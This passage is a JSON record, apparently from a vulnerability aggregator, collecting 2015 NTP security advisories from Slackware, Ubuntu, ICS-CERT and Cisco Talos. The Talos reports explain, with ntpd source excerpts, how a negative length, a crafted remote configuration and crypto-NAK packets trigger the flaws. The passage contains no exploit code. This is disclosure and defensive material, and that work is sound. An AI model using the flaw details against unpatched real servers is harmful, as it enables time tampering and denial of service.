13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p4-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p4-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p4-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p4-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p4-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p4-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n21dd14178fea17a88c9326c8672ecefd ntp-4.2.8p4-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n8647479b2007b92ff8598184f2275263 ntp-4.2.8p4-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\ne0f122e8e271dc84db06202c03cc0288 ntp-4.2.8p4-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\ndb0aff04b72b3d8c96ca8c8e1ed36c05 ntp-4.2.8p4-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n5914e43e886e5ff88fefd30083493e30 ntp-4.2.8p4-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n4335c3bf2ae24afc5ad734e8d80b3e94 ntp-4.2.8p4-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n39b05698797b638b67130e0b170e0a4b ntp-4.2.8p4-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\ndcf4a56ba1d013ee1c9d0e624e158709 ntp-4.2.8p4-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n1fd3a7beaf23303e2c211af377662614 ntp-4.2.8p4-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n438c3185aa8ec20d1c2b5e51786e4d41 ntp-4.2.8p4-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n81bfb2fed450cb26a51b5e1cee0d33ed n/ntp-4.2.8p4-i586-1.txz\n\nSlackware x86_64 -current package:\n8bae4ad633af40d4d54b7686e4b225f9 n/ntp-4.2.8p4-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ntp-4.2.8p4-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n > sh /etc/rc.d/rc.ntpd restart", "modified": "2015-10-29T22:49:05", "published": "2015-10-29T22:49:05", "id": "SSA-2015-302-03", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.581166", "type": "slackware", "title": "[slackware-security] ntp", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7703", "CVE-2015-7855", "CVE-2015-5219", "CVE-2015-7704", "CVE-2015-7701", "CVE-2015-7692", "CVE-2015-7702", "CVE-2015-5194", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7691", "CVE-2015-5196", "CVE-2015-7705", "CVE-2015-5300", "CVE-2015-5195", "CVE-2015-7850", "CVE-2015-7853"], "description": "Multiple memory corruptions.", "edition": 1, "modified": "2015-11-01T00:00:00", "published": "2015-11-01T00:00:00", "id": "SECURITYVULNS:VULN:14751", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14751", "title": "ntp multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7703", "CVE-2015-7855", "CVE-2015-5146", "CVE-2015-5219", "CVE-2015-7704", "CVE-2015-7701", "CVE-2015-7692", "CVE-2015-7702", "CVE-2015-5194", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7691", "CVE-2015-5196", "CVE-2015-7705", "CVE-2015-5300", "CVE-2015-5195", "CVE-2015-7850", "CVE-2015-7853"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2783-1\r\nOctober 27, 2015\r\n\r\nntp vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in NTP.\r\n\r\nSoftware Description:\r\n- ntp: Network Time Protocol daemon and utility programs\r\n\r\nDetails:\r\n\r\nAleksis Kauppinen discovered that NTP incorrectly handled certain remote\r\nconfig packets. In a non-default configuration, a remote authenticated\r\nattacker could possibly use this issue to cause NTP to crash, resulting in\r\na denial of service. (CVE-2015-5146)\r\n\r\nMiroslav Lichvar discovered that NTP incorrectly handled logconfig\r\ndirectives. In a non-default configuration, a remote authenticated attacker\r\ncould possibly use this issue to cause NTP to crash, resulting in a denial\r\nof service. (CVE-2015-5194)\r\n\r\nMiroslav Lichvar discovered that NTP incorrectly handled certain statistics\r\ntypes. In a non-default configuration, a remote authenticated attacker\r\ncould possibly use this issue to cause NTP to crash, resulting in a denial\r\nof service. (CVE-2015-5195)\r\n\r\nMiroslav Lichvar discovered that NTP incorrectly handled certain file\r\npaths. In a non-default configuration, a remote authenticated attacker\r\ncould possibly use this issue to cause NTP to crash, resulting in a denial\r\nof service, or overwrite certain files. (CVE-2015-5196, CVE-2015-7703)\r\n\r\nMiroslav Lichvar discovered that NTP incorrectly handled certain packets.\r\nA remote attacker could possibly use this issue to cause NTP to hang,\r\nresulting in a denial of service. (CVE-2015-5219)\r\n\r\nAanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP\r\nincorrectly handled restarting after hitting a panic threshold. A remote\r\nattacker could possibly use this issue to alter the system time on clients.\r\n(CVE-2015-5300)\r\n\r\nIt was discovered that NTP incorrectly handled autokey data packets. A\r\nremote attacker could possibly use this issue to cause NTP to crash,\r\nresulting in a denial of service, or possibly execute arbitrary code.\r\n(CVE-2015-7691, CVE-2015-7692, CVE-2015-7702)\r\n\r\nIt was discovered that NTP incorrectly handled memory when processing\r\ncertain autokey messages. A remote attacker could possibly use this issue\r\nto cause NTP to consume memory, resulting in a denial of service.\r\n(CVE-2015-7701)\r\n\r\nAanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP\r\nincorrectly handled rate limiting. A remote attacker could possibly use\r\nthis issue to cause clients to stop updating their clock. (CVE-2015-7704,\r\nCVE-2015-7705)\r\n\r\nYves Younan discovered that NTP incorrectly handled logfile and keyfile\r\ndirectives. In a non-default configuration, a remote authenticated attacker\r\ncould possibly use this issue to cause NTP to enter a loop, resulting in a\r\ndenial of service. (CVE-2015-7850)\r\n\r\nYves Younan and Aleksander Nikolich discovered that NTP incorrectly handled\r\nascii conversion. A remote attacker could possibly use this issue to cause\r\nNTP to crash, resulting in a denial of service, or possibly execute\r\narbitrary code. (CVE-2015-7852)\r\n\r\nYves Younan discovered that NTP incorrectly handled reference clock memory.\r\nA malicious refclock could possibly use this issue to cause NTP to crash,\r\nresulting in a denial of service, or possibly execute arbitrary code.\r\n(CVE-2015-7853)\r\n\r\nJohn D "Doug" Birdwell discovered that NTP incorrectly handled decoding\r\ncertain bogus values. An attacker could possibly use this issue to cause\r\nNTP to crash, resulting in a denial of service. (CVE-2015-7855)\r\n\r\nStephen Gray discovered that NTP incorrectly handled symmetric association\r\nauthentication. A remote attacker could use this issue to possibly bypass\r\nauthentication and alter the system clock. (CVE-2015-7871)\r\n\r\nIn the default installation, attackers would be isolated by the NTP\r\nAppArmor profile.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n ntp 1:4.2.6.p5+dfsg-3ubuntu8.1\r\n\r\nUbuntu 15.04:\r\n ntp 1:4.2.6.p5+dfsg-3ubuntu6.2\r\n\r\nUbuntu 14.04 LTS:\r\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.5\r\n\r\nUbuntu 12.04 LTS:\r\n ntp 1:4.2.6.p3+dfsg-1ubuntu3.6\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2783-1\r\n CVE-2015-5146, CVE-2015-5194, CVE-2015-5195, CVE-2015-5196,\r\n CVE-2015-5219, CVE-2015-5300, CVE-2015-7691, CVE-2015-7692,\r\n CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7704,\r\n CVE-2015-7705, CVE-2015-7850, CVE-2015-7852, CVE-2015-7853,\r\n CVE-2015-7855, CVE-2015-7871\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu8.1\r\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu6.2\r\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.5\r\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.6\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-01T00:00:00", "published": "2015-11-01T00:00:00", "id": "SECURITYVULNS:DOC:32649", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32649", "title": "[USN-2783-1] NTP vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "ics": [{"lastseen": "2020-12-18T03:22:27", "bulletinFamily": "info", "cvelist": ["CVE-2015-7855", "CVE-2015-7704", "CVE-2015-7871", "CVE-2015-5300"], "description": "## OVERVIEW\n\nSiemens has reported to NCCIC/ICS-CERT that NTP daemon vulnerabilities exist in the Siemens RUGGEDCOM ROX-based devices. Siemens has produced firmware updates to mitigate these vulnerabilities.\n\nThese vulnerabilities could be exploited remotely.\n\n## AFFECTED PRODUCTS\n\nThe following Siemens RUGGEDCOM ROX versions are affected when NTP service is activated:\n\n * ROX II: All versions prior to 2.9.0, and\n * ROX I: All versions.\n\nThe NTP service is deactivated on ROX I and ROX II-based devices by default.\n\n## IMPACT\n\nAn attacker exploiting these vulnerabilities could cause the NTP daemon to accept malicious time updates, prevent it from receiving updates, or crash.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSiemens is an international company headquartered in Munich, Germany.\n\nThe affected products, Siemens RUGGEDCOM ROX-based devices, are used to connect devices that operate in harsh environments such as electric utility substations and traffic control cabinets. According to Siemens, RUGGEDCOM ROX-based devices are deployed across several sectors including Energy, Healthcare and Public Health, and Transportation Systems. Siemens estimates that these products are used worldwide.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### AUTHENTICATION BYPASS ISSUESa\n\nAn attacker could potentially make the NTP daemon accept time updates from nonspecified NTP servers by sending specially crafted UDP packets to the NTP service (Port 123/UDP).\n\nCVE-2015-7871b has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).c\n\n### IMPROPER INPUT VALIDATIONd\n\nAn attacker could potentially crash the NTP daemon by sending specially crafted UDP packets to the NTP service (Port 123/UDP).\n\nCVE-2015-7855e has been assigned to this vulnerability. A CVSS v3 base score of 2.2 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L).f\n\n### IMPROPER INPUT VALIDATIONg\n\nAn attacker could potentially prevent the device from fetching time updates from its configured time servers by sending specially crafted UDP packets to the NTP service (Port 123/UDP) while the NTP daemon is running.\n\nCVE-2015-7704h has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).i\n\n### IMPROPER INPUT VALIDATIONj\n\nAn attacker could potentially modify the time on the device by sending specially crafted UDP packets to the NTP service (Port 123/UDP) under certain circumstances.\n\nCVE-2015-5300k has been assigned to this vulnerability. A CVSS v3 base score of 3.7 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).l\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThese vulnerabilities could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nNo known public exploits specifically target these vulnerabilities.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit these vulnerabilities.\n\n## MITIGATION\n\nThe NTP service is deactivated on ROX I and ROX II-based devices by default.\n\nSiemens provides firmware update V2.9.0 for ROX II-based devices to mitigate the vulnerabilities. To obtain the firmware update, please contact Siemens support at:\n\n<http://www.siemens.com/automation/support-request>\n\nor a local hotline center:\n\n<http://www.automation.siemens.com/mcms/aspa-db/en/automationtechnology/Pages/default.aspx>\n\nFor ROX I-based devices and ROX II versions before ROX 2.9.0, Siemens recommends implementing the following mitigations:\n\n * Block NTP packets from unknown peers using firewall rules.\n * Employ NTP time synchronization in trusted network only.\n * Ensure that the NTP configuration file contains the \u201cnoquery\u201d flag for all nonlocal restrict statements, or deactivate NTP service if the functionality is not required.\n * Configure NTP authentication and configure the \u201cnotrust\u201d flag for all nonlocal restrict statements on the NTP configuration (only applies to ROX II).\n\nFor more information on these vulnerabilities and detailed instructions, please see Siemens Security Advisory SSA-472334 at the following location:\n\n<http://www.siemens.com/cert/advisories/>\n\nICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-592: Authentication Bypass issues, http://cwe.mitre.org/data/definitions/592.html, web site last accessed December 22, 2015.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7871, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * c. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N, web site last accessed December 22, 2015.\n * d. CWE-20: Improper Input Validation, http://cwe.mitre.org/data/definitions/20.html, web site last accessed December 22, 2015.\n * e. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7855, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * f. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L, web site last accessed December 22, 2015.\n * g. CWE-20: Improper Input Validation, http://cwe.mitre.org/data/definitions/20.html, web site last accessed December 22, 2015.\n * h. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7704, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * i. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L, web site last accessed December 22, 2015.\n * j. CWE-20: Improper Input Validation, http://cwe.mitre.org/data/definitions/20.html, web site last accessed December 22, 2015.\n * k. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5300, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * l. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N, web site last accessed December 22, 2015.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-15-356-01>); we'd welcome your feedback.\n", "edition": 18, "modified": "2018-08-27T00:00:00", "published": "2015-12-22T00:00:00", "id": "ICSA-15-356-01", "href": "https://www.us-cert.gov//ics/advisories/ICSA-15-356-01", "title": "Siemens RUGGEDCOM ROX-based Devices NTP Vulnerabilities", "type": "ics", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:33:07", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7703", "CVE-2015-7855", "CVE-2015-5146", "CVE-2015-5219", "CVE-2015-7704", "CVE-2015-7701", "CVE-2015-7692", "CVE-2015-7702", "CVE-2015-5194", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7691", "CVE-2015-5196", "CVE-2015-7705", "CVE-2015-5300", "CVE-2015-5195", "CVE-2015-7850", "CVE-2015-7853"], "description": "Aleksis Kauppinen discovered that NTP incorrectly handled certain remote \nconfig packets. In a non-default configuration, a remote authenticated \nattacker could possibly use this issue to cause NTP to crash, resulting in \na denial of service. (CVE-2015-5146)\n\nMiroslav Lichvar discovered that NTP incorrectly handled logconfig \ndirectives. In a non-default configuration, a remote authenticated attacker \ncould possibly use this issue to cause NTP to crash, resulting in a denial \nof service. (CVE-2015-5194)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain statistics \ntypes. In a non-default configuration, a remote authenticated attacker \ncould possibly use this issue to cause NTP to crash, resulting in a denial \nof service. (CVE-2015-5195)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain file \npaths. In a non-default configuration, a remote authenticated attacker \ncould possibly use this issue to cause NTP to crash, resulting in a denial \nof service, or overwrite certain files. (CVE-2015-5196, CVE-2015-7703)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain packets. \nA remote attacker could possibly use this issue to cause NTP to hang, \nresulting in a denial of service. (CVE-2015-5219)\n\nAanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP \nincorrectly handled restarting after hitting a panic threshold. A remote \nattacker could possibly use this issue to alter the system time on clients. \n(CVE-2015-5300)\n\nIt was discovered that NTP incorrectly handled autokey data packets. A \nremote attacker could possibly use this issue to cause NTP to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2015-7691, CVE-2015-7692, CVE-2015-7702)\n\nIt was discovered that NTP incorrectly handled memory when processing \ncertain autokey messages. A remote attacker could possibly use this issue \nto cause NTP to consume memory, resulting in a denial of service. \n(CVE-2015-7701)\n\nAanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP \nincorrectly handled rate limiting. A remote attacker could possibly use \nthis issue to cause clients to stop updating their clock. (CVE-2015-7704, \nCVE-2015-7705)\n\nYves Younan discovered that NTP incorrectly handled logfile and keyfile \ndirectives. In a non-default configuration, a remote authenticated attacker \ncould possibly use this issue to cause NTP to enter a loop, resulting in a \ndenial of service. (CVE-2015-7850)\n\nYves Younan and Aleksander Nikolich discovered that NTP incorrectly handled \nascii conversion. A remote attacker could possibly use this issue to cause \nNTP to crash, resulting in a denial of service, or possibly execute \narbitrary code. (CVE-2015-7852)\n\nYves Younan discovered that NTP incorrectly handled reference clock memory. \nA malicious refclock could possibly use this issue to cause NTP to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2015-7853)\n\nJohn D \"Doug\" Birdwell discovered that NTP incorrectly handled decoding \ncertain bogus values. An attacker could possibly use this issue to cause \nNTP to crash, resulting in a denial of service. (CVE-2015-7855)\n\nStephen Gray discovered that NTP incorrectly handled symmetric association \nauthentication. A remote attacker could use this issue to possibly bypass \nauthentication and alter the system clock. (CVE-2015-7871)\n\nIn the default installation, attackers would be isolated by the NTP \nAppArmor profile.", "edition": 6, "modified": "2015-10-27T00:00:00", "published": "2015-10-27T00:00:00", "id": "USN-2783-1", "href": "https://ubuntu.com/security/notices/USN-2783-1", "title": "NTP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talos": [{"lastseen": "2020-07-01T21:25:22", "bulletinFamily": "info", "cvelist": ["CVE-2015-7853"], "description": "# Talos Vulnerability Report\n\n### TALOS-2015-0064\n\n## Network Time Protocol Reference Clock Memory Corruption Vulnerability\n\n##### October 21, 2015\n\n##### CVE Number\n\nCVE-2015-7853\n\n##### Description\n\nA potential buffer overflow vulnerability exists in the refclock of ntpd. An invalid length provided by a hardware reference clock could cause a buffer overflow potentially resulting in memory being modified. A malicious reflock could provide a negative length to trigger this vulnerability.\n\n##### Tested Versions\n\nntp 4.2.8p2\n\n##### Product URLs\n\n<http://www.ntp.org>\n\n##### Details\n\nAt line 3233 in ntp_io.c, a size check is performed to ensure that the length provided isn\u2019t greater than the space available in the buffer that is being written to.\n \n \n 3233\ti = (rp->datalen == 0\n 3234\t|| rp->datalen > (int)sizeof(rb->recv_space))\n 3235\t? (int)sizeof(rb->recv_space)\n 3236\t: rp->datalen;\n 3237\tdo {\n 3238\t\tbuflen = read(fd, (char *)&rb->recv_space, (u_int)i);\n 3239\t} while (buflen < 0 && EINTR == errno);\n \n\nHowever, the size is performed by casting the size of the buffer to an integer type and doing an integer comparison. This means that if datalen is negative, then i will be assigned a negative value, resulting in a buffer overflow when it is used as an argument to read at line 3238.\n\n##### Credit\n\nYves Younan of Cisco Talos\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2015-0065\n\nPrevious Report\n\nTALOS-2015-0063\n", "edition": 11, "modified": "2015-10-21T00:00:00", "published": "2015-10-21T00:00:00", "id": "TALOS-2015-0064", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2015-0064", "title": "Network Time Protocol Reference Clock Memory Corruption Vulnerability", "type": "talos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:19:57", "bulletinFamily": "info", "cvelist": ["CVE-2015-7850"], "description": "# Talos Vulnerability Report\n\n### TALOS-2015-0055\n\n## Network Time Protocol Remote Configuration Denial of Service Vulnerability\n\n##### October 21, 2015\n\n##### CVE Number\n\nCVE-2015-7850\n\n##### Description\n\nAn exploitable denial of service vulnerability exists in the remote configuration functionality of the Network Time Protocol. A specially crafted configuration file could cause an endless loop resulting in a denial of service. An attacker could provide a the malicious configuration file to trigger this vulnerability.\n\n##### Tested Versions\n\nntp 4.2.8p2\n\n##### Product URLs\n\n<http://www.ntp.org>\n\n##### Details\n\nWhen sending a remote configuration file, an attacker can enable extended logging via the logconfig=allall setting. An attacker can also set the keys file when specifying this remote configuration. If the attacker sets the keys file to be the log file, the key parsing will go into an endless loop. NTP will log an invalid key in parsing, and will then subsequently parse that line as a key and again log the error, continuing in an infinite loop.\n\n##### Credit\n\nYves Younan of Cisco Talos\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2015-0062\n\nPrevious Report\n\nTALOS-2015-0054\n", "edition": 10, "modified": "2015-10-21T00:00:00", "published": "2015-10-21T00:00:00", "id": "TALOS-2015-0055", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2015-0055", "title": "Network Time Protocol Remote Configuration Denial of Service Vulnerability", "type": "talos", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2020-12-01T21:21:40", "bulletinFamily": "info", "cvelist": ["CVE-2015-7871"], "description": "# Talos Vulnerability Report\n\n### TALOS-2015-0069\n\n## NAK to the Future: NTP Symmetric Association Authentication Bypass Vulnerability\n\n##### October 21, 2015\n\n##### CVE Number\n\nCVE-2015-7871\n\n##### Summary\n\nUnauthenticated off-path attackers can force ntpd processes to peer with malicious time sources of the attacker\u2019s choosing allowing the attacker to make arbitrary changes to system time. This attack leverages a logic error in ntpd\u2019s handling of certain crypto-NAK packets. When a vulnerable ntpd receives an NTP symmetric active crypto-NAK packet, it will peer with the sender bypassing the authentication typically required to establish a peer association.\n\n##### Tested Versions\n\nntp 4.2.8p3\n\n##### Product URLs\n\n<http://www.ntp.org>\n\n##### CVSS Score\n\nCVSSv2: 6.4 - (AV:N/AC:L/Au:N/C:N/I:P/A:P) \nCVSSv3: 7.2 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L\n\n##### Details\n\nIn most common configurations, ntpd determines which other NTP daemons to peer with via explicit configuration directives specified by an administrator in the ntp.conf configuration file. However, ntpd also has the ability to create ephemeral peer associations on the fly in response to certain kinds of incoming requests. In most common configurations, if ntpd receives such a packet, it will set up an ephemeral association with the sender only if the packet is correctly authenticated under a key that ntpd trusts.\n\nFor example, when ntpd receives a symmetric active (NTP mode 1) packet and there is no existing peer association with the sender, ntpd executes the following check to determine if the packet has been correctly authenticated before mobilizing a new ephemeral symmetric association.\n \n \n /* From: ntp_proto.c */\n \n \n if (!AUTH(sys_authenticate | (restrict_mask &\n (RES_NOPEER | RES_DONTTRUST)), is_authentic)) {\n \n \n /*\n * If authenticated but cannot mobilize an\n * association, send a symmetric passive\n * response without mobilizing an association.\n * This is for drat broken Windows clients. See\n * Microsoft KB 875424 for preferred workaround.\n */\n if (AUTH(restrict_mask & RES_DONTTRUST,\n is_authentic)) {\n fast_xmit(rbufp, MODE_PASSIVE, skeyid,\n restrict_mask);\n return; /* hooray */\n }\n if (is_authentic == AUTH_ERROR) {\n fast_xmit(rbufp, MODE_ACTIVE, 0,\n restrict_mask);\n sys_restricted++;\n return;\n }\n }\n \n\nIn contrast to the simpler checks present in other locations where ephemeral associations are mobilized, the logic for symmetric active packets has been complicated by a workaround to accommodate some non standards compliant clients. The intent of this code appears to be:\n\n * if (AUTH(restrict_mask & RES_DONTTRUST, is_authentic)): If the packet is not authenticated and the sender is not restricted with \u201cnotrust\u201d, it\u2019s probably a non standards compliant client that mistakenly sends symmetric active mode packets instead of client mode (NTP mode 4) packets. In this case, it returns the symmetric passive response expected by such clients and ceases further processing (fast_xmit(); return;).\n * if (is_authentic == AUTH_ERROR): Otherwise, return a symmetric active mode crypto-NAK and cease further processing (fast_xmit(); return;).\n\nIn most cases, when ntpd receives a packet with a cryptographic digest that does not validate correctly, it bails out early and responds with a crypto-NAK \u2014 an unauthenticated packet containing a keyid but no cryptographic digest which informs the sender that the received packet was not correctly authenticated.\n\nInternally, ntpd represents the authentication state of a received packet using the \u201cis_authentic\u201d variable which can take on four values under the following conditions:\n \n \n | is_authentic | packet has | packet has | packet validates |\n | | keyid | digest | under keyid |\n |--------------+------------+------------+------------------|\n | AUTH_NONE | N | N | N/A |\n | AUTH_OK | Y | Y | Y |\n | AUTH_ERROR | Y | Y | N |\n | AUTH_CRYPTO | Y | N | N/A |\n \n\nThus, when ntpd receives a crypto-NAK packet, it sets the \u201cis_authentic\u201d variable to the special value AUTH_CRYPTO. This has interesting implications for the authentication check described above. The AUTH() macro always returns false if the second input is AUTH_CRYPTO. 